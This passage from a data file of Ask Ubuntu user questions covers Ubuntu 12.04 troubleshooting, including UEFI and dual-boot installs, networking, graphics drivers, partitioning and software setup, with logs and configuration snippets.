\efi\grub\grub.cfg next says \efi\ubuntu\ubuntu , cfg i 'm confused and getting frustrated . how do i correctly install ubuntu 12.04 in uefi mode on this machine ? ? ?
150260	ssd tweaks for ubuntu 12.04	i need to tweak my dell xps 13z ssd for maximum performance and life cycle than i read the solutions explained here , but it is for 11.10 and my fstab is different . for now my fstab is looks like this : proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=abf5ce9e-bdb7-4b2f-a7bd-bbd9efa72a98 / ext4 errors=remount-ro 0 1 # /home was on /dev/sda2 during installation uuid=491427b2-7482-4483-b6eb-7c564b991aff /home ext4 defaults 0 2 # swap was on /dev/sda3 during installation # uuid=7551000d-e708-4e0f-9fd2-9f93119f63fb none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 tmpfs /tmp tmpfs mode=1777 and my rc.local is looks like this : echo noop > /sys/block/sda/queue/scheduler echo deadline > /sys/block/sda/queue/scheduler echo 1 > /sys/block/sda/queue/iosched/fifo_batch exit 0 do you have any suggestions , what should i do ? regards
150264	network setup not working . ca n't connect to the internet in ubuntu	i want to know how to set-up network in 12.04 using automatic settings ( dhcp ) . i installed ubuntu , but i ca n't seen to see the network connection . what can i do ? my notebook has no wireless only cable . the cable will not fit in . how can i plug it in ? do i need a special cable ? there is no router can i fix this myself , or should i call a technician ? also can i use usb to connect to the network/internet ? please can you help thank you jamel
150266	ubuntu software centre , update manager fail to open	on my ubuntu 12.04 lts system the software centre and update manager do not open . i am unable to install any updates . and the message given below pops up . i am looking for a step-by-step process to fix this , and as a newbie , i do n't know how to use the command line . could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened
150267	how to add a local repository in kickseed-based install ?	according to the ubuntu installation guide , automated installs are possible using kickseed , a subset of the redhat's kickstart configuration . the automatic install section of the installation guide details the differences between rh's kickstart and ubuntu 's kickseed . however , nothing is written about the repo command , which in kickstart is used to enable additional repositories . the format of rh and ubuntu repositories is different : just the repository url is enough to identify the repo in rh derivatives , whereas a line in /etc/apt/sources.list.d carries more information . can anybody please post an example of a repo line in ubuntu's kickseed , or point me to the appropriate documentation ? ( or even the relevant section of the kickseed source code ? ) ( background story : i want to automate ubuntu installs ; our standard install includes some packages that are not publicly available , and that we distribute via a local private repository . )
150278	gerix wifi cracker and aircrack-ng in ubuntu 12.04 ?	i am have install aircrack-ng from its official site . compiling its source and installing . and gerix also from official site source . i am using ar9285 with ath9k drivers included default with ubuntu 12.04 but on performing injection test its says `` mon is on channel -1 '' and i am unable to perform injection .
150280	wireless connection troubles	i just recently switched from windows 7 over to ubuntu 12.04 and have been experiencing some issues connecting to my home 's wireless network . the only way i can get it to connect to the network is by disabling ipv4 and ipv6 settings . even then while it says its connected to the network ( 3 bars ) , i 'm unable to access the internet . it connected for a little while after i first installed ubuntu , but after the first reboot i have n't been able to access the web at all . i have very basic knowledge when it comes to computers and barely any when dealing with ubuntu and linux . i 'm very happy with ubuntu apart from this one issue , as before my computer was overheating and crashing , i 've yet to experience any of those problems since installing ubuntu . the information i can give may be very limited since i 'm having to use my cell phone to figure out the solution to this . any help would be greatly appreciated . thanks in advance !
150281	nvidia segfault crashes xserver ( 12.04 fresh install )	i am on a fresh install of 12.04 , and my video card is a quadro fx 570 , which appears to be supported ( see output of unity_support_test below ) . but my xserver crashes randomly and causes my session to just shutdown and bring me back to the logging screen . this happens several times per hour . after checking syslog it that a segfault in the nvidia driver is the cause of the problem : jun 13 11:14:17 lima kernel : [ 86569.828982 ] xorg [ 17940 ] : segfault at ffebeb69 ip b4c8f7aa sp bf8076dc error 4 in nvidia_drv.so [ b47a7000+706000 ] jun 13 11:14:36 lima gnome-session [ 18119 ] : gdk-warning : gnome-session : fatal io error 11 ( ressource temporairement non disponible ) on x server :3. # 012 the funny thing is that as i was reporting this bug , my xserver crashed again ( ! ) and this time i got another error message : jun 13 11:29:39 lima kernel : [ 87491.106441 ] nvrm : xid ( 0000:02:00 ) : 6 , pe0001 jun 13 11:29:39 lima gnome-session [ 26493 ] : gdk-warning : gnome-session : fatal io error 11 ( ressource temporairement non disponible ) on x server :4. # 012 any idea as to what can be the problem given that i am on a fresh install with a supported video card ? this is the output of unity_support_test : $ /usr/lib/nux/unity_support_test -p opengl vendor string : nvidia corporation opengl renderer string : quadro fx 570/pcie/sse2 opengl version string : 3.3.0 nvidia 295.40 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes
150288	is there a way to get a separate desktop/gnome terminal for each user logged in through vnc ?	is there a way to get a separate desktop/gnome terminal for each user logged in through vnc ? i want to be able to have several people working simultanously on the same machine in ubuntu .
150289	can not turn off password	can not authenticate without a password it did not fix my problem . if i create an admin account without password in the first place , what should i enter in place of the password ? also , how to perform administrative actions ( such as sudo or downloading apps from ubuntu software center ) without password ? how to remove the password entirely from my admin accounts ? note : in windows 7 , when you do not set a password or remove the existing password for an administrator , that administrator can be used to authenticate without a password . leave the password blank and you can do anything .
150290	adjust mouse keys in 12.04 ?	i checked under keyboard and there is no option to adjust `` mouse keys '' . i turned it on under `` universal access '' , but there was no option to adjust sensitivity or acceleration there . under `` mouse and touchpad '' , there were two tabs , one for a touchpad and one for a mouse , neither of which affected `` mouse keys '' . anybody have any idea where the devs decided to put the options in precise ?
150291	how do i securely store passwords ?	how do i securely store passwords in ubuntu ? are there any tools available for this ?
150292	boot failure after upgrade ubuntu 12.04	my laptop can not boot up after i upgrade ubuntu 12.04 . the error message is unsupported number of auguments ( 3 ) back to default xsession anyone have solution to this problem ?
150293	adding partitions to dual boot on windows	i am trying to install ubuntu 12.04 along side windows 7 on an hp mini 210 netbook . i have down loaded an iso image ok and got the installation program working but i am having problems with partitioning . i want to keep my windows installation intact so i am following the 'other ' installation route . i have managed to shrink the main windows partition down to 50gb leaving 250gb free space but i ca n't find a way of adding any extra partitions for ubuntu . the free space gets listed by the installer as 'unusable ' but on the graphic at the top its called 'free space ' . if i select this and click 'install now ' i get an error message : 'no root file system is defined ' . i have tried clicking the add , change delete and new partition table buttons with the unusable partition selected and nothing happens . how do i define a root mount point when i do not have any linux partitions ?
150302	is there any way to get notified when battery is full ?	i 'm using ubuntu 12.04 on a laptop , i was wondering if there is a way to get notified when the battery become full .
150306	could i use ubuntu one to sync my calendar ?	is there a way ( supported/unsupported or even in theory ) that i can create a calendar on my desktop via thunderbird 's lightning extension then sync that calendar file with ubuntu one and then sync that same file on my android phone in a way that the calendar application on it can update the file ( and sync it back to the ubuntu one cloud ) .
150308	using two monitors , ubuntu is n't very 'snappy'/responsive any more ?	i 've recently hooked up a second monitor to my laptop , and for some reason , ubuntu is n't very snappy any more . there 's a very slight lag between me doing an action and it showing up . for example , after typing a letter , there 's a tiny delay between me pressing the button and it showing up on the screen . it 's not a huge issue , but it gets quite annoying . i doubt it 's my actual system , as it 's fairly high end . a6-3400m amd processor , 16gb ram , amd radeon 6540g2 ( 1gn vram ) graphics card . also , i 'm using gnome shell instead of unity . i do n't have any fancy compiz settings , etc installed . any ideas ?
150311	how to install macbuntu on an ubuntu minimal install ?	i 've tried going for cinnamon install however the process failed . discussion here . i want to try a different approach . thus my question is , how do i install macbuntu or mac-4-lin right onto a ubuntu minimal environment .
150315	problem with using wmctrl to arrange windows in compiz	i 'm trying to write a bash script to control the arrangement of open windows on a particular viewport and have run up against a problem which is basically i ca n't find a way to reposition the windows in the right order -- the `` right order '' being the one we might get by alt-tab . so typically i run my script and the windows are in the right places on screen , but the terminal from which it ran ends up underneath some other window , this being because the list of windows returned by wmctrl does n't seem to be in alt-tab order . perhaps wmctrl does n't have that information , in which case i 'm hoping someone can suggest an alternative interface or approach . and while i have your attention maybe someone can also explain an oddity i 've discovered which is that the window origins returned by `` wmctrl -lg '' seem to be in 1/2 pixel units +/- an x and y offset or `` something '' ( while the width+height are in pixels ) ? so for example : $ wmctrl -i -r 0x08e01de3 -e 0,100,100 , -1 , -1 moves the specified window to what looks like 100,100 on screen but then reading the window information back : $ wmctrl -lg|grep 0x08e01de3 0x08e01de3 0 196 246 1267 639 u10 196 ? 246 ? it 's consistent and so easy enough to code around but seems odd to me and has me worried that i 'm misunderstanding something . thanks for any help and apologies if i 've broken any rules with this posting . it 's my first `` ask '' and i 'll try to improve for next time .
150316	i have problems with compiling powertop on ubuntu precise	i tried to compile the latest release of powertop from github . i get some errors and i dont know what to do to fix this . make [ 3 ] : leaving directory `/root/powertop/src' make [ 2 ] : leaving directory `/root/powertop/src' making all in po make [ 2 ] : entering directory `/root/powertop/po' test ! -f ./powertop.pot || \ test -z `` hu_hu.gmo id_id.gmo zh_tw.gmo '' || make hu_hu.gmo id_id.gmo zh_tw.gmo make [ 3 ] : entering directory `/root/powertop/po' rm -f hu_hu.gmo & & : -c -- statistics -- verbose -o hu_hu.gmo hu_hu.po mv : can not stat `t-hu_hu.gmo ' : no such file or directory make [ 3 ] : *** [ hu_hu.gmo ] error 1 make [ 3 ] : leaving directory `/root/powertop/po' make [ 2 ] : *** [ stamp-po ] error 2 make [ 2 ] : leaving directory `/root/powertop/po' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/root/powertop' make : *** [ all ] error 2
150318	installing on a mac without a cd burner or usb boot	i am new to ubuntu , i installed it in an old pc and now it works great ! ! ! my macbook pro has a glitch and refuses to run mac os x , so i installed windows , and i really want ubuntu since windows is not for me . here 's the problem ( s ) my drive only reads dvds , if i put a blank in it , it will ignore it and my mac has the updated efi , so no booting from a usb connected device ! i also tried wubi , but then i cant make it a full partition and get rid of windows ! ! ! thank you !
150320	installing age of empires ii using playonlinux does n't work ?	i have tried installing age of empires 2 using playonlinux , the installation appeared to go fine but when i try and open the game it says there is a serious fault . the error report is below , unfortunately this does n't mean alot to me , i was wondering if you could help , a ) by highlighting the problem and b ) by suggesting a solution . many thanks unhandled exception : page fault on read access to 0xffffffff in 32-bit code ( 0x0040aaad ) . register dump : cs:0073 ss:007b ds:007b es:007b fs:0033 gs:003b eip:0040aaad esp:0033fd00 ebp:0033fde4 eflags:00010293 ( r- -- i s -a- -c ) eax:00000001 ebx : bde88d9d ecx:00000067 edx:00400000 esi:7b867c00 edi:00400000 stack dump : 0x0033fd00:00410fed 00000000 00400000 00000067 0x0033fd10:0041ab90 00130d8a 7b895848 7bc483b1 0x0033fd20:0044c800 00000002 0044bdd0 7bca4e6c 0x0033fd30:7bc3590f 00000800 00000094 00000005 0x0033fd40:00000000 00000893 00000002 76726553 0x0033fd50:20656369 6b636150 00003420 00000800 backtrace : = > 0 0x0040aaad in empires2 ( +0xaaad ) ( 0x0033fde4 ) 1 0x0041ace2 in empires2 ( +0x1ace1 ) ( 0x0033fe70 ) 2 0x7b85ac0c call_process_entry+0xb ( ) in kernel32 ( 0x0033fe88 ) 3 0x7b85e13b in kernel32 ( +0x4e13a ) ( 0x0033fec8 ) 4 0x7bc714f0 call_thread_func_wrapper+0xb ( ) in ntdll ( 0x0033fed8 ) 5 0x7bc7172d call_thread_func+0x7c ( ) in ntdll ( 0x0033ffa8 ) 6 0x7bc714ce rtlraiseexception+0x21 ( ) in ntdll ( 0x0033ffc8 ) 7 0x7bc4c30e in ntdll ( +0x3c30d ) ( 0x0033ffe8 ) 0x0040aaad : pop % ss modules : module address debug info name ( 51 modules ) pe 400000- 44b000 export empires2 pe 10000000-1000c000 deferred drvmgt elf 35cae000-35d24000 deferred rpcrt4 -pe 35cc0000-35d24000 \ rpcrt4 elf 68000000-68022000 deferred ld-linux.so.2 elf 68022000-681c7000 deferred libc.so.6 elf 681c7000-681cc000 deferred libdl.so.2 elf 681cc000-681f8000 deferred libm.so.6 elf 681f8000-68201000 deferred libnss_compat.so.2 elf 68201000-6821b000 deferred libnsl.so.1 elf 6821b000-68228000 deferred libnss_files.so.2 elf 68228000-68366000 deferred user32 -pe 68240000-68366000 \ user32 elf 68366000-68421000 deferred gdi32 -pe 68370000-68421000 \ gdi32 elf 68421000-68481000 deferred advapi32 -pe 68430000-68481000 \ advapi32 elf 68481000-68499000 deferred version -pe 68490000-68499000 \ version elf 68499000-68533000 deferred libfreetype.so.6 elf 68533000-68549000 deferred libz.so.1 elf 68549000-685db000 deferred winex11 -pe 68550000-685db000 \ winex11 elf 685db000-685e4000 deferred libsm.so.6 elf 685e4000-685fe000 deferred libice.so.6 elf 685fe000-68610000 deferred libxext.so.6 elf 68610000-68744000 deferred libx11.so.6 elf 68744000-6874a000 deferred libuuid.so.1 elf 6874a000-68751000 deferred libxdmcp.so.6 elf 68751000-68755000 deferred libxinerama.so.1 elf 68755000-6875b000 deferred libxxf86vm.so.1 elf 6875b000-68765000 deferred libxrender.so.1 elf 68765000-6876e000 deferred libxrandr.so.2 elf 6876e000-68772000 deferred libxcomposite.so.1 elf 68772000-68782000 deferred libxi.so.6 elf 68782000-687b6000 deferred libfontconfig.so.1 elf 687b6000-687e0000 deferred libexpat.so.1 elf 687e0000-687eb000 deferred libxcursor.so.1 elf 687eb000-687f1000 deferred libxfixes.so.3 elf 6f102000-6f10e000 deferred libnss_nis.so.2 elf 7194d000-7196e000 deferred imm32 -pe 71950000-7196e000 \ imm32 elf 72c76000-72db7000 dwarf libwine.so.1 elf 75d65000-75d86000 deferred libxcb.so.1 elf 79223000-79227000 deferred libxau.so.6 elf 7b800000-7b8f5000 dwarf kernel32 -pe 7b810000-7b8f5000 \ kernel32 elf 7bc00000-7bcc1000 dwarf ntdll -pe 7bc10000-7bcc1000 \ ntdll elf 7bf00000-7bf03000 deferred elf 7c708000-7c723000 deferred libpthread.so.0 threads : process tid prio ( all id : s are in hex ) 00000008 ( d ) c : \program files\microsoft games\age of empires ii\empires2.exe 00000009 0 < == 0000000e services.exe 00000039 0 00000038 0 0000001f 0 00000019 0 00000018 0 00000017 0 00000015 0 00000010 0 0000000f 0 00000012 winedevice.exe 0000001e 0 0000001a 0 00000014 0 00000013 0 0000001b plugplay.exe 00000021 0 0000001d 0 0000001c 0 00000024 explorer.exe 00000025 0 00000035 winedevice.exe 0000003a 0 00000037 0 00000036 0 system information : wine build : wine-1.4-rc1 platform : i386 host system : linux host version : 3.2.0-24-generic
150323	how do i boot up in windows after using the wubi installer	i used the wubi installer ( using a 15 gb install size , presuming this was the amount it would use as its partition of the hard drive , but apparently it does n't use a partition ) on windows 7 . on reboot ubuntu booted up without a dual boot menu . what can i do to get back into my windows environment ? i do use 2 hard drives with windows files on the c : drive ( along with music and photos ) and the wubi installed on the d : drive ( along with games and a back up of the windows on the c : drive ) . even when booting from c : drive it still boots up ubuntu . i need a fix that does not involve reformatting either hard drive preferably , or perhaps i am just missing an obvious option in the ubuntu environment .
150327	running java applets in the browser	with my 12.04 , if i point my browser ( either firefox or chrome ) to http : //www.java.com/en/download/testjava.jsp it will say that java is not working . after a sudo apt-get install default-jre the problem persists . what is the `` ubuntu way '' to have the java applets run ?
150334	how do i automatically load my ~/.zprofile when i log in ?	i 've started using zsh for my login shell . i 've create an a ~/.zprofile , but in order for it to be put into effect , i have to manually source it . how can i have my settings load automatically ?
150338	how to get ubuntu server installed from ubuntu minimal ?	once i install ubuntu minimal , then i have option to customize it the way i want . i can either use it as such with the terminal mode , make it ubuntu desktop by apt-get install ubuntu-desktop make it kubuntu by apt-get install kubuntu-desktop make it lubuntu by apt-get install lubuntu-desktop and so on ... . one can see a difference with the ubuntu server version , that during installation it gives option to select ssh server tomcat server lamp dns server , etc now i am looking for a way or a command something like apt-get install ubuntu-server so that i may install ubuntu-minimal and then proceed with the further process of making it server in one go . i do n't want to install individual components ( like components of lamp or dns ) one by one . i am looking for an automated way similar to the one present in ubuntu server distribution .
150340	how to set up a virtualhost on amazon ec2 for phpmyadmin	hi i 'm currently working on setting up a virtualhost on amazon ec2 for accessing phpmyadmin so i can access it with test.example.com as oppose to it being widely available as it 's default example.com/phpmyadmin . so far i 've created a file `` testfile '' in /etc/apache2/sites-available/ with the code below and enabled it `` a2ensite testfile '' however i 'm not getting the vhost to work < virtualhost *:80 > serveradmin webmaster @ example.com servername test.example.com serveralias test.example.com # documentroot /usr/share/phpmyadmin documentroot /home/user/public_html/folder rewriteengine on rewritecond % { http_host } ! test.example.com rewriterule ( . * ) [ l ] < directory /home/user/public_html/folder > options followsymlinks directoryindex index.php allowoverride none < ifmodule mod_php5.c > addtype application/x-httpd-php .php php_flag magic_quotes_gpc off php_flag track_vars on php_flag register_globals off php_admin_flag allow_url_fopen off php_value include_path . php_admin_value upload_tmp_dir /var/lib/phpmyadmin/tmp php_admin_value open_basedir /usr/share/phpmyadmin/ : /etc/phpmyadmin/ : /var/lib/phpmyadmin/ < /ifmodule > < /directory > # authorize for setup < directory /usr/share/phpmyadmin/setup > < ifmodule mod_authn_file.c > authtype basic authname `` phpmyadmin setup '' authuserfile /etc/phpmyadmin/htpasswd.setup < /ifmodule > require valid-user < /directory > # disallow web access to directories that do n't need it < directory /usr/share/phpmyadmin/libraries > order deny , allow deny from all < /directory > < directory /usr/share/phpmyadmin/setup/lib > order deny , allow deny from all < /directory > errorlog /home/user/public_html/folder/logs/error.log loglevel warn customlog /home/user/public_html/folder/logs/access.log combined < /virtualhost > sudo ln -s /usr/share/phpmyadmin /home/user/public_html/folder the above line creates a link of the phpmyadmin in the public folder . any help on this would be greatly appreciated . note : example.com will be replaced with my official domain
150347	sqlite binary file does not work on my ubuntu,	i 'm new to sqlite , i just got the binary of sqlite by using wget http : //www.sqlite.org/sqlite-shell-linux-x86-3071300.zip , then extract sqlite3 from the zip file , it does not work , it 's driving me crazy , please help . my os is ubuntu 12.04 64-bit , the steps of execution of sqlite as follows , u1 @ newhost : /tmp $ ls -hl sqli* -rwxrwxr-x 1 u1 u1 568k jun 11 17:35 sqlite3 -rw-rw-r -- 1 u1 u1 310k jun 12 02:53 sqlite-shell-linux-x86-3071300.zip u1 @ newhost : /tmp $ file sqlite3 sqlite3 : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.24 , buildid [ sha1 ] =0x8637c6613a485b675a05f155564cc0eda4b2d3cc , stripped u1 @ newhost : /tmp $ ./sqlite3 mydb.db -bash : ./sqlite3 : no such file or directory u1 @ newhost : /tmp $ for security reason , i removed . from the $ path , so i just use ./sqlite3 to launch update below : this way works for fedora 15 32-bit [ root @ newhostfedora15 ~ ] # ./sqlite3 test.db sqlite version 3.7.13 2012-06-11 02:05:22 enter `` .help '' for instructions enter sql statements terminated with a `` ; '' sqlite > .e this also works on centos 5.6 64-bit but does not work for root on my ubuntu 12.04 64-bit either , root @ newhost : ~ # unzip sqlite-shell-linux-x86-3071300.zip archive : sqlite-shell-linux-x86-3071300.zip inflating : sqlite3 root @ newhost : ~ # ./sqlite3 f -bash : ./sqlite3 : no such file or directory root @ newhost : ~ # ldd ./sqlite3 not a dynamic executable i got this issue as the result , it works on ubuntu 12.04 32-bit , cenetos 5.6 64-bit , does not work on ubuntu 12.04 64-bit , fedora 17 64-bit , sqlite 's 32-bit binary is great enough although it does n't work for every platform . i 'll keep it in mind that to it is best to compile my own 64-bit binary from the source or it will be awesome if sqlite 64-bit binary is provide through the official web-site : p
150351	is it possible to copy wubi install to another computer ?	i am new to ubuntu and linux overall . i am using ubuntu on dual boot in my dell netbook . i installed wubi yesterday and did lots of customizing and installing things . i have a desktop with no os in it . i wanted to make it ubuntu . but i ca n't go through all the trouble and terminal and stuff . so i was wondering is there a way to copy my whole ubuntu system ( os and all apps and files ) and install them on my desktop ? ( so i have everything like i did on my netbook ? )
150357	laptop camera ( /dev/video ) not there after suspend - reboot needed to get it back	camera stops working on my laptop after suspend and wake . i have to restart to get it back . when listing the /dev/ directory there is no /dev/video after wake . is there a way to get it back without restarting since i practically use suspend instead shutdown ?
150358	why unity does n't remember edge bindings settings from compiz ?	i 'm very used to use edge bindings in my workflow , but since i 've updated to 12.04 unity forget my edge bindings settings on every new session . why it is appening and how to fix it ?
150359	how to uninstall imagemagick ?	i 'm trying to uninstall imagemagick and install . but i 'm not able to uninstall . can anyone tell me how to uninstall imagemagick ?
150361	difference between launching an application from a keyboard shortcut vs the terminal ?	what i have observed : when i type emacs in gnome-terminal , it launches in the same environment , with variables set in .bashrc . if i use a keyboard shortcut to the command emacs , it opens in an environment that does not have these variables . questions : is there a reason for this behaviour ? how can i get emacs to open in an environment with settings from .bashrc ? if i have root access , can i set these variables 'system-wide ' ? additional background : i need is to be able to access the variables from within r , as described in a related so question ( how to access a bash environment variable from within r in emacs ) , and i also need the path to my texlive distribution for auctex . the present question is different in that i am more generally interested in the difference between launching emacs from within the terminal and launching emacs from the applications menu , gnome-do , or keyboard shortcut that call either emacs or /usr/bin/emacs23 % f .
150364	slow performance on hp dc7800 sff desktop	i have installed latest ubuntu 64 bit on the hp dc7800 with core 2 duo e6550 . it has 2gb ram . not a stellar machine , but i 'm getting very poor performance . windows and applications are slow to open and move . checked drivers and it says `` no propietary drivers '' are installed . i just flattened and re-installed the 32-bit , as read somewhere that 2gb is bare minimum for a 64-bit install . 32-bit seems the same symptoms . what can i do to diagnose and rectify the sluggish performance ?
150367	how do i boot into recovery mode ?	i recently tried booting into the grub2 's menu entry `` ubuntu gnu/linux , with linux 3.2.0-24-generic-pae ( recovery mode ) just to see what was there . it booted successfully , but i had no idea what to do after i was there . my question is where can i find some documentation on the recovery mode and what to do if i truly needed to be there . i 'm running ubuntu 12.04 .
150373	a routine update wrote grub in the mbr ; how do i undo it ?	i have ubuntu 12.04 and windows7 installed onto a machine so that i could boot into either one . i wanted to keep using the windows bootloader ( actually easybcd ) , so i made sure that i did n't install grub into the mbr , and all was well . however , a week or two ago , just doing a routine update with update manager , it updated grub but put it into the mbr ( without telling me and without asking my permission ) , disabling the windows bootloader , so now the machine boots into grub instead . i 'd like to get it back to booting into the windows bootloader . i 've read it is easy to fix this , but i do n't know how . any help ?
150378	how to fix mbr partition prior to ubuntu installation ? a partition overlaps gpt backup sectors	my main problem is that i have just acquired an asus laptop with windows 7 and i want to install ubuntu on it . i want to have a dual boot to choose between both operating systems , i read that it 's better to first install windows and then ubuntu , because windows installer overwrites ubuntu 's boot loader . so , i tried to install ubuntu 12.04 lst from an usb pendrive , but when it check for other os doen 's find the windows 7 system . i checked posibled causes and re-installed windows 7 from the recovery partition in the hd but i got the same result . aparently ubuntu installer found two partition tables ( gpt and mbr ) and it does n't know which one to use . i used gdisk to try to solve the problem . from the fdisk and gdisk outputs below , i know that i have to fix my mbr partition but i do n't know how . ubuntu @ ubuntu : ~ $ sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 500.1 gb , 500107862016 bytes 256 heads , 63 sectors/track , 60563 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x7834646f device boot start end blocks id system /dev/sda1 1 4294967295 2147483647+ ee gpt ubuntu @ ubuntu : ~ $ sudo gdisk -l /dev/sda gpt fdisk ( gdisk ) version 0.8.5 partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . warning ! secondary partition table overlaps the last partition by 33 blocks ! you will need to delete this partition or resize it in another utility . disk /dev/sda : 976773168 sectors , 465.8 gib logical sector size : 512 bytes disk identifier ( guid ) : b1142ef0-26cb-4f15-9c42-afc122e50e2a partition table holds up to 128 entries first usable sector is 34 , last usable sector is 976773134 partitions will be aligned on 2048-sector boundaries total free space is 122884062 sectors ( 58.6 gib ) number start ( sector ) end ( sector ) size code name 1 2048 411647 200.0 mib ef00 efi system partition 2 411648 673791 128.0 mib 0c01 microsoft reserved part 3 673792 391383039 186.3 gib 0700 basic data partition 4 391383040 802693119 196.1 gib 0700 basic data partition 5 925575168 976773167 24.4 gib 2700 basic data partition command ( ? for help ) : r recovery/transformation command ( ? for help ) : o disk size is 976773168 sectors ( 465.8 gib ) mbr disk identifier : 0x7834646f mbr partitions : number boot start sector end sector status code 1 1 4294967295 primary 0xee
150379	how do i rip a dvd including menus and extras to a menu driven divx file ( or any lossy format that supports menus ) ?	i am asking exactly this question for the same reason , but would like to archive dvds as small , low quality video , while preserving the menu choosing experience . i would like to rip my dvds to something that has the same menus but whose video is in a much more compressed format . i do not want to copy a dvd to an .iso image . how can this be done in the most automatic ( hopefully cli ) way possible ? any format is fine so long as playback on linux is possible .
150386	white , red and green screen flicker	i updated 12.04 this morning through the update manager ( ca n't remember what it was , but it was only one thing ) and everything was fine up until a few minutes ago when my screen changed and began flickering a partitioned white , red and green . i ca n't access any of the terminals so i 'm not sure what to do . any help is appreciated . cheers . edit : i 'm running a dell studio 1558 which has an ati mobility radeon hd 5470
150389	can i run unity 3d on a laptop with optimus.solved	since i do not see any such instances on this thread , i would like to say that my unity works in 3d on a laptop that has optimus technology running on it . i have an nvidia 525m gpu and an intel hd 3000 graphics card ( i915 ? ) . i am using nvidia drivers for cuda , with bumblebee , and while installation , it was not allowed to config my display ( no xorg was created ) .so essentially my unity is running on my intel drivers ( i915 drivers that are available from the ubuntu repository . u can get this from software center ) . i was having problems with this earlier since ubuntu dint seem to detect certain settings for unity , but its running fine after an update ( automatic ) on some glx packages . for some reason , /usr/lib/unity_support_test doesnt run now , and i can not give you details on what were missing earlier . but i thought that this might be useful to someone .
150394	ubuntu on a secondary drive concurrant with windows 7	i 'm a developer who must rely on windows for various programs that simply do n't run in linux . my first thought is to run ubuntu within some sort of virtual machine , such as vbox . however , my primary drive is an ssd ( samsung 470/256gb ) , and i 've heard that it is a bad idea for your ssd to run vm 's on it ( i guess it decreases its longevity substantially , due to the nature of write methodology or something ? ) . for what i want to do , dual boot would not be realistic , since i basically just want ubuntu running in the background , mostly , and to shell into it when i need to do stuff . i like ubuntu specifically , because that 's what we use on our production server ; this would allow me a dev environment local to my machine ( this probably . i realize this is probably a stupid question - after all , how could two os 's share the same physical resources ? googling was n't very helpful , but maybe there is some sort of software or methodology i 'm not thinking to search for . thoughts ? suggestions ? i suppose another take could be some solution that makes virtualization on ssd 's safe ?
150395	can you recommend some softwares for ubuntu 12.04	i would like to install some softwares to my newly installed ubuntu . i want softwares dealing with electronics , physics and such like subjects . ( like a scientific educational and experimental one ) . thanks in advance .
150398	i used to apt-get install ubuntu-desktop on my ubuntu server . can i apt-get install ubuntu-server on my ubuntu desktop ?	i am running 12.04 x64 desktop in virtualbox . i did find this article about how to setup and install a lamp ( linux-apache-mysql-php ) server in ubuntu ( which has details on how to install several different packages manually ) but first i am going to try looking for a repository that contains a ubuntu-server package ( or something like it ) . i do n't know if this exists but it seems like it should .
150406	how do i re-enable disabled network notifications in gnome shell ?	i 'm using ubuntu 12.04 lts . i recently disabled ( accidentally pressed `` do n't show again '' button ) some network notification on gnome shell . there are ( as i can remember ) : '' gsm network - you are now registered on the home network '' '' < network profile > - connection established '' now both on unity and gnome shell , those notifications did n't showed up , and it felt just wrong . what can i do to re-enable those disabled notifications ? thanks .
150407	uninstall ubuntu 12.04	hi can anyone please tell me how to uninstall ubuntu 12.04 ? i have installed it via a live cd but now i want to uninstall ubuntu 12.04 and install ubuntu 10.04 . can anyone please tell me the steps ? i want my windows to be there . it should not go . sorry i forgot to mention that mine is dual booting system
150409	does having two gpu 's help ?	i recently installed another gpu on my system . it 's of the same type and driver that my other gpu is , and it is pci whereas the other one is agp . they are both running and detected , and i am wondering what exactly are the benefits of having two gpu 's like this , do n't be afraid to get technical . thanks !
150410	is there any interesting game for ubuntu	can you please tell me if there is any interesting game that i could play in ubuntu ? if yes please recommend some .
150420	how to stream to hdmi and airtunes simultaneously pulseaudio	the only reason i keep my windows partition is because i can stream simultaneously from my desktop hdmi and one or more apple airport express < i can not get this to happen with pulseaudio . it 's either hdmi or airport , but not both . i have `` add virtual output device for simultaneous output.. '' checked . i see a combined output for hdmi and digital only . is there a way to manually configure for simultaneous streams ?
150423	change color of date and weather app in ubuntu 12.04 & mate	i have recentely installed ubuntu 12.04 and as i am a truly gnome 2 lover i also switched from unity to mate . the font color of the weather/date applet is barely visible so i was wondering how i can change it . i already tried to explore all the options shown in the menu when i right-click on the applet , but apparently there 's no such feature . so is there anything i could do in order to customize the font color in order to make the text more readable ?
150425	lan works but internet gone after going to static ip	i had a perfectly functioning ubuntu 12.04 system . i saw a youtube video from defcon where a guy was discussing attacking home routers . in an internet search of home router security i found a 2011 cert paper on strengthening soho routers . one tip was to reduce the number of ips on the lan and to use static ips . i went into my 12.04 machine . i set up the static ip address , 192.168.1.7 , that i had prepared at the router and lost internet access . the lan still works . when i boot to windows 7 , windows 7 has internet access . when i go back to dchp in ubuntu , reboot , and check i again have lan access but no internet access - different ip [ 192.168.1.11 ] from dhcp . i completely reinstalled ubuntu from a cd - same problem . i did a search on askubuntu and found 2 previous posts wired internet does n't work on ubuntu 12.04 from april 29 internet access problem in 12.04 from april 28 i tried those things and they did n't work . any ideas , strategies , and tactics for troubleshooting this issue would be much appreciated . here are some diagnostics which may be helpful : ifconfig eth0 eth0 link encap : ethernet hwaddr e0 : cb:4e : b1:26 : dc inet addr:192.168.1.11 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :e2cb:4eff : feb1:26dc/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1816 errors:0 dropped:0 overruns:0 frame:0 tx packets:2168 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 